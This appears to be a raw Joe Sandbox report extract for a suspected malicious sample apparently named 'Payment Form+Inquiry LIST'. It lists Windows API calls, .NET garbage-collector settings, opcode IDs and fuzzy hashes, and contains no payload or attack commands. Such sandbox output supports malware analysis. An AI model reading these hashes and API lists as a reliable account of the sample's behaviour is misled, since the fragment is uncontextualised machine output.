BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                            • API String ID: 1004003707-1492036319
                            • Opcode ID: 1862b040dfa0aa20fa9b930549220c12fbfb3527a35bdf50325036bc5f1cbcbb
                            • Instruction ID: d4bba559c86006c9043ac13ab2f5fcea9efef4c54c3b564a478a2776a9aebc08
                            • Opcode Fuzzy Hash: 1862b040dfa0aa20fa9b930549220c12fbfb3527a35bdf50325036bc5f1cbcbb
                            • Instruction Fuzzy Hash: 6D62B626D0DB47D8FA02DBB5A8402A22BE1EFA5744F844036C45DC7276DE2EA15DC78F
                            APIs
                            Strings
                            Similarity
                            • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                            • String ID: SeLockMemoryPrivilege
                            • API String ID: 1752251271-475654710
                            • Opcode ID: acbb3d299e41888ec6866634865e251bbb6dcee1bb0ab8316e1da59d9c6b1da2
                            • Instruction ID: d72ad5f7f0b753cb439f5c4f58fb01b97b959d30614c3f79b954a2479a69c89e
                            • Opcode Fuzzy Hash: acbb3d299e41888ec6866634865e251bbb6dcee1bb0ab8316e1da59d9c6b1da2
                            • Instruction Fuzzy Hash: B131CF73A1CA428AFB209BB1B5443AA67A2EB94B84F044074DE4E97A54DE3ED405C74D
                            APIs
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256B58
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256CAB
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256D83
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256D99
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF6E8257441), ref: 00007FF6E8256E15
                            Strings
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: [ KeepUnwinding ]
                            • API String ID: 2546344036-400895726
                            • Opcode ID: bc1ece02c8a8cc7deb67b16b3ca6687fcff076318ea1244f4e1a57b41394721c
                            • Instruction ID: 59f6d244e60f6b9252cc8eb16fdd1dfed1b3f1ca64929d69124a0473a38c7c87
                            • Opcode Fuzzy Hash: bc1ece02c8a8cc7deb67b16b3ca6687fcff076318ea1244f4e1a57b41394721c
                            • Instruction Fuzzy Hash: 2CB15933A4AB4189EB948F30D5407A933A1FB44B48F580136CE4D8B398DF3AE955C39A
                            APIs
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: 58f0a1f78f3038062b96adf870200572365bf3702c4026d2a62309caccee7141
                            • Instruction ID: edc320b3d3e145627e96e7692f9a4b0faa703212bdfb52cb4793ce9068a19f64
                            • Opcode Fuzzy Hash: 58f0a1f78f3038062b96adf870200572365bf3702c4026d2a62309caccee7141
                            • Instruction Fuzzy Hash: 2E111C26B54B058AEF00CFB0E8552A833A4FB59768F440E31DE6D867A4EF79D1688345
                            APIs
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: adaaeb83c35ca74f50f49f9627e3b41c21a1c9c20bda17f901148958122b3767
                            • Instruction ID: bc519fb55689fce060a3f29d51af2979dcfa272aceda3bd73edefb58358b4009
                            • Opcode Fuzzy Hash: adaaeb83c35ca74f50f49f9627e3b41c21a1c9c20bda17f901148958122b3767
                            • Instruction Fuzzy Hash: 90B16A63A09B428AEA509B78D6443B873A0FB14B94F448535DA1DC73A5DF3EF494C38E
                            APIs
                            Strings
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID: @
                            • API String ID: 3168844106-2766056989
                            • Opcode ID: f0ef4aa89743a7b3ac6a9866301a25a9799488a80a8622f3ab40c6711f891bda
                            • Instruction ID: db71b227abb1e1edd2bc16c72ffe7aecb3f87a7f4d423ac4fc5e91b47d2862eb
                            • Opcode Fuzzy Hash: f0ef4aa89743a7b3ac6a9866301a25a9799488a80a8622f3ab40c6711f891bda
                            • Instruction Fuzzy Hash: AE914C23A1C646CBFB518F35EA40375A2A0EF55B84F580135C94CC76A5DE2FF488978E
                            APIs
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: 1051c25b48e73d9c0e44e351c7ca1797daa53e6601eef59b1f86331242a91ab9
                            • Instruction ID: 0c9430d7819922a7231fc19645ea51a379c07caf36a559d32d535087a23b18fb
                            • Opcode Fuzzy Hash: 1051c25b48e73d9c0e44e351c7ca1797daa53e6601eef59b1f86331242a91ab9
                            • Instruction Fuzzy Hash: A8E1727BA09B918AEB608B25E50036DB360FB44B94F544131DA5D83B98DF7EE441C78E
                            APIs
                            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6E8257E5B,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8261CEF
                            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6E8257E5B,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8261D4C
                            Similarity
                            • API ID: EnabledFeaturesState
                            • String ID:
                            • API String ID: 1557480591-0
                            • Opcode ID: 806af91b1d32c00ef7ec50295839dbf2ffb405343f8b848cdc30ad716dfe7f6e
                            • Instruction ID: 781c1b94eebafe87495e3b3c3ecabc2d1b7a0727813612e90d084e20464b250b
                            • Opcode Fuzzy Hash: 806af91b1d32c00ef7ec50295839dbf2ffb405343f8b848cdc30ad716dfe7f6e
                            • Instruction Fuzzy Hash: B351D033F282220BFF6C446991A937512875BA9360F854539DA4ED32C2CD2FF802768D
                            APIs
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 32a7cf4d0a956533d5ea72fe7eed7f9228e68fe6483b65906fae45b442e3f00e
                            • Instruction ID: 5b9874f191c24f5b3c9607ec8c8647846b6e08a9abaf2aaf60f24215b9ed3fb4
                            • Opcode Fuzzy Hash: 32a7cf4d0a956533d5ea72fe7eed7f9228e68fe6483b65906fae45b442e3f00e
                            • Instruction Fuzzy Hash: AF417023B18A9689EB108F36E651379A3A0FB44BC4F181035DE4D97B95DF3EE050834D
                            Strings
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 94cf00b91eddb1979c5eb3837ab65cd260dae8569e862585b2f0dce0c0f59cb7
                            • Instruction ID: 28d6207e6c7f6bae1caa5c5fe96ef00c8795baf9281760f4cc183f3f676e9076
                            • Opcode Fuzzy Hash: 94cf00b91eddb1979c5eb3837ab65cd260dae8569e862585b2f0dce0c0f59cb7
                            • Instruction Fuzzy Hash: 22429933E08A96CAEA518B25EA0077977A0FB547A4F454236CA6DC37D0DF3EE454834E
                            Strings
                            Similarity
                            • API ID:
                            • String ID: ?
                            • API String ID: 0-1684325040
                            • Opcode ID: 42c7ba14f30e3ea73d2a5bba1dd5255a1b4ce2924ed444ed1f271061779197f3
                            • Instruction ID: 4d15644037a0f9633d36e1f6f701a0989b776d4bcfacebd6c4bc5e5b27ba4af7
                            • Opcode Fuzzy Hash: 42c7ba14f30e3ea73d2a5bba1dd5255a1b4ce2924ed444ed1f271061779197f3
                            • Instruction Fuzzy Hash: 2512E333A18B428AEA10CB22E60477963A5FB55B94F544231CA5D87BD4CF3FE449C78D
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                            • Instruction ID: 97cc1842619d7ad6c609d5d2e8e31a35a87730b0a65645b630b007384d824059
                            • Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                            • Instruction Fuzzy Hash: 02D1CDB3B107498BE7188F39A60526932A2E744BE8F141235CE5D47BDCDF3AD910C789
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 403d853accab671321e6428cea3bc8e22a4cafdc399a328a43a78b81db51eab1
                            • Instruction ID: f6364d750e624f1b47fb3591cf162dd457215d3482d6f496b06c16b886341352
                            • Opcode Fuzzy Hash: 403d853accab671321e6428cea3bc8e22a4cafdc399a328a43a78b81db51eab1
                            • Instruction Fuzzy Hash: 0992BF63A1CA46C9EE418BB5AA407B4A395FF54BC4F454236D90ED3361EE3FE049834E
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 663cb1b513d747172d33621aad4c006f1f54a1c76b72a9c74f0a92d891e25ed0
                            • Instruction ID: 4bd424d9096748d547be82348db199cd74a9612766bea886dc06ee14e33f6669
                            • Opcode Fuzzy Hash: 663cb1b513d747172d33621aad4c006f1f54a1c76b72a9c74f0a92d891e25ed0
                            • Instruction Fuzzy Hash: DD529D33B08B458AEB108F75E5442AD77A1FB48B88B044535EE4E97B88CE3EE455C74D
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f43b6c74be654565ad4a547809dde052e2382720aa5b1e6440db89c10b1f5e0
                            • Instruction ID: 3cd3e096637054ab65f87895d7b293c1dd98507e621236458f8137d9eb9d18a8
                            • Opcode Fuzzy Hash: 2f43b6c74be654565ad4a547809dde052e2382720aa5b1e6440db89c10b1f5e0
                            • Instruction Fuzzy Hash: B532B123B096468EEF10CBB5D6413BC27B5EB04798B044536DE0DA7B88DE3AE455C38E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa5bc22fa0d592459f6b9aea6ff0628d5a97a275616a507ad5fe3cda84cb54be
                            • Instruction ID: 322ac495ba2e14a285b95344b703ee625fda47eac86f05b89ef187293596d2b3
                            • Opcode Fuzzy Hash: fa5bc22fa0d592459f6b9aea6ff0628d5a97a275616a507ad5fe3cda84cb54be
                            • Instruction Fuzzy Hash: CD127FE3A19B9685EE558B2AC24436867A0FF15BA4F549235CE2C833D4DF2ED490C38D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e2e59dcd522b5fee78a2a5929f8b7ce2f35e885a2ab0bfb27a88b49f3e1c0e6
                            • Instruction ID: 3a270af831fbe9f92a80e71adfe63ed14f20bbb10f9c7697db030572e76adb65
                            • Opcode Fuzzy Hash: 9e2e59dcd522b5fee78a2a5929f8b7ce2f35e885a2ab0bfb27a88b49f3e1c0e6
                            • Instruction Fuzzy Hash: EEF16C63F395428AF73A4B7899013BD6252EF91300F149234DE9D867D8EE3EB545838E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5774a83956436ea9650049361b529952f7d0fdaf0821fa971780029ab67f058c
                            • Instruction ID: 319a04260796095cc407108e0084be777c3dfad4ef2eaabe4ae7e53fe14e2922
                            • Opcode Fuzzy Hash: 5774a83956436ea9650049361b529952f7d0fdaf0821fa971780029ab67f058c
                            • Instruction Fuzzy Hash: 0602C173A18A568AEB148F26E54077877A4EB45BA4F404336CA2DD37D0CE3EE445D38E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuery
                            • String ID:
                            • API String ID: 2783962273-0
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID:
                            • API String ID: 3706814929-0
                            • Opcode ID: 7b7093f65bd2b0ff49ecdfc413e7c2789058b9ef1101d239f0ad87b5e710f3ba
                            • Instruction ID: 0306752ed83c278c848bf12c9abdeeb0cf20d0d7b85359b1460a7113f5a960b0
                            • Opcode Fuzzy Hash: 7b7093f65bd2b0ff49ecdfc413e7c2789058b9ef1101d239f0ad87b5e710f3ba
                            • Instruction Fuzzy Hash: 0A214623B186414AFB208B36E555B7A7210EB98740F548031EE0FD3B88ED3ED008CB4E
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                            • Instruction ID: 3ff305c87088d6cba200e98105d4b5e4ee0f27341870ec59a0eb83f0654700a3
                            • Opcode Fuzzy Hash: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                            • Instruction Fuzzy Hash: E511A033F091454BDB189F65E4502AAA262BBA8759B589134DACCCB75CFE3CC8918708
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0fa9edb113635520e6e36d2213430e9332871d6f1d44029fa3af90c6e7f30ef
                            • Instruction ID: 73d6e4f965483cc24737a00f05ca92b6604e3ef260717112b85d5c65bb3526bd
                            • Opcode Fuzzy Hash: b0fa9edb113635520e6e36d2213430e9332871d6f1d44029fa3af90c6e7f30ef
                            • Instruction Fuzzy Hash: 4AF0F653F5420289EA14AB72FD451F992209F55780F441034D90ECB796EE2EE445838E
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 956d08503f66edbf06cb58d2ba122eebf8d0324aa98dc1fffbf170e4d1119ffb
                            • Instruction ID: 38efea81bdaf90a5761bb00f2624987e88165e828661be6a77e80f9ff3f97060
                            • Opcode Fuzzy Hash: 956d08503f66edbf06cb58d2ba122eebf8d0324aa98dc1fffbf170e4d1119ffb
                            • Instruction Fuzzy Hash: D9F0A056E5810A98E904AF76EE422F8D2311F66780F4C2031D80EDB6A7AE0EE004438F
                            APIs
                            Strings
                            Similarity
                            • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                            • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                            • API String ID: 2652322181-269241671
                            • Opcode ID: 9709ce755b04e42be9981605d6c423657624e5586ab4d3976e82517fc70a045b
                            • Instruction ID: d5ef8547f599255c177ddcf9f5dbacdc02085ddea8bba92e8ab30739e2ce5bf3
                            • Opcode Fuzzy Hash: 9709ce755b04e42be9981605d6c423657624e5586ab4d3976e82517fc70a045b
                            • Instruction Fuzzy Hash: 7D519E32A0874285EA60DB72A5543B963A1EF98B94F444134CD5EC77D8EF3EE409C78E
                            APIs
                            Strings
                            Similarity
                            • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                            • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                            • API String ID: 2652322181-269241671
                            • Opcode ID: 9fba28cf1afb429e11db75650f3934dc10554abb7736396653c39c14cc915cad
                            • Instruction ID: 1e867ba4868795505b7a4c3b1d48ecd0905de8733857659dd9dd73730faf72a0
                            • Opcode Fuzzy Hash: 9fba28cf1afb429e11db75650f3934dc10554abb7736396653c39c14cc915cad
                            • Instruction Fuzzy Hash: 8C519E32A0874285EA60DB72A5503B963A1EF98B94F444134CD5EC7798EF3EE409C78E
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D7DE
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D806
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D826
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D846
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D866
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D88A
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D8AE
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6E8263CD7,?,?,?,?,00007FF6E825CCE5), ref: 00007FF6E825D8D2
                            Strings
                            Similarity
                            • API ID: strcmp
                            • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                            • API String ID: 1004003707-945519297
                            • Opcode ID: bcebf5a6f252cbb09dfa09eef273a2f758d43f54852196089d452d364a587b90
                            • Instruction ID: 4668094d9405b350d7c41661c4d3882ede2982d4bea1c4a92d67975b6f78e50d
                            • Opcode Fuzzy Hash: bcebf5a6f252cbb09dfa09eef273a2f758d43f54852196089d452d364a587b90
                            • Instruction Fuzzy Hash: D2414056E48A4295F652A736AA003B413A1AF01BF4F540371D87C976DDDF2EE846C38F
                            APIs
                            Strings
                            Similarity
                            • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                            • String ID: InitializeContext2$kernel32.dll
                            • API String ID: 4102459504-3117029998
                            • Opcode ID: 16d3fee5cfa0fcf09c2cb1223e46ebea1838c8a0d7b597ddaf9c999af425626a
                            • Instruction ID: 0b4fbeec6ea90c9709b0fe79428b4b763649b759ce5037482d8595f405432ded
                            • Opcode Fuzzy Hash: 16d3fee5cfa0fcf09c2cb1223e46ebea1838c8a0d7b597ddaf9c999af425626a
                            • Instruction Fuzzy Hash: DD31A223B18B4681EA11CBB0A5443796391EF48B90F080435DD5C82798EF7EE446C75E
                            APIs
                            Strings
                            Similarity
                            • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                            • String ID:
                            • API String ID: 510365852-3916222277
                            • Opcode ID: cf3d6e846313f3faf6da6ddee579c375e6772a5ff4c8a8f0db3351e708a0123f
                            • Instruction ID: 781455bfd684b064f6bc1294e117417759e23aafb7e7b91c5717e0f7d41d9698
                            • Opcode Fuzzy Hash: cf3d6e846313f3faf6da6ddee579c375e6772a5ff4c8a8f0db3351e708a0123f
                            • Instruction Fuzzy Hash: 4211C273A08B818AD760EF65B4402DA7350FB457B4F140335E6BD4BADACF39D4428789
                            APIs
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 923e4c15c36c671b645af422b1c922f83f6391a097a5c1f7a03866067d5f11e0
                            • Instruction ID: b1311e04ce0aace3cdf363404c38bb4e058fc323ac5d4acb55a397905a7ba25f
                            • Opcode Fuzzy Hash: 923e4c15c36c671b645af422b1c922f83f6391a097a5c1f7a03866067d5f11e0
                            • Instruction Fuzzy Hash: B1613923A1DA8AC9EE509B21EA813B573A4EF85790F550031D99DC3761DF3EE049C78E
                            APIs
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 95a3fec7bfcf4f7b88a60be85c82b2bde261c563bd8ac75406ddc58967cceedc
                            • Instruction ID: 373e52dd85f6e247394d8545e305666063ac06d8ab8e669f88ef249aa931619a
                            • Opcode Fuzzy Hash: 95a3fec7bfcf4f7b88a60be85c82b2bde261c563bd8ac75406ddc58967cceedc
                            • Instruction Fuzzy Hash: 6351493791DB8AC9EA609F20EA403B973A4EF95790F450035C99DC3665DF3EE058878E
                            APIs
                            Strings
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: Process is terminating due to StackOverflowException.
                            • API String ID: 2546344036-2200901744
                            • Opcode ID: 7cf52375af1028233e90cac4dcea04e721c70769caab80c77cf0b8a6fae5d76c
                            • Instruction ID: 3e7174d438a787a998216eba453d04825e9ac083174ed7bdf426f971890b3a84
                            • Opcode Fuzzy Hash: 7cf52375af1028233e90cac4dcea04e721c70769caab80c77cf0b8a6fae5d76c
                            • Instruction Fuzzy Hash: 4B51C623B49B4289EF508B29D5943796390EF49B94F049031DA1EC77B8DF2EE455838F
                            APIs
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: b9b0ab16afc07ccf16aeca724bf885404bfb9df2ed0c540a79699a48ff797aa1
                            • Instruction ID: 6c1ec8df02cda9048c886b795155c1d215a6066fd425cdb425bffc371e6eefe1
                            • Opcode Fuzzy Hash: b9b0ab16afc07ccf16aeca724bf885404bfb9df2ed0c540a79699a48ff797aa1
                            • Instruction Fuzzy Hash: 41417533F096468AEB648E36D2407797250EB40BD4F588139D64FC67C9DE3EE440A79E
                            APIs
                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C914
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C91E
                            • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C93D
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E8253141), ref: 00007FF6E825C951
                            Similarity
                            • API ID: ErrorLastMultipleWait$HandlesObjects
                            • String ID:
                            • API String ID: 2817213684-0
                            • Opcode ID: c37379b00bf82ea155403ded38e02c18f4784a01f515fd6f355ba75294a0392b
                            • Instruction ID: f4b547126e77214922fd4eae8f9f429e1d70b37e07028c5dee568d62a99123fc
                            • Opcode Fuzzy Hash: c37379b00bf82ea155403ded38e02c18f4784a01f515fd6f355ba75294a0392b
                            • Instruction Fuzzy Hash: ED115132708796C6DB245B75B50023AB261FB58B90F140139EADD97BD8DF3ED4408789
                            APIs
                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E82B19F3), ref: 00007FF6E82B2730
                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E82B19F3), ref: 00007FF6E82B2771
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3975dceb791f57bb3fcf29378d87f0c658d09fa8d7692f204abce351d6e993e4
                            • Instruction ID: 6b0984530e07b0f559ba72f968f3f5e144bdcf5ca375661b9d16b2ff27116a4d
